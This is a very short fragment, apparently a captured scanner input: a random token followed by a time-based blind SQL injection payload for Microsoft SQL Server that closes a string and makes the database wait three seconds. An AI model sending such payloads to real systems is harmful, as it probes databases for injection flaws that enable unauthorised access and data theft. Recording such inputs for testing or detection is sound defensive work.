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555o5uqVCAn'); waitfor delay '0:0:3'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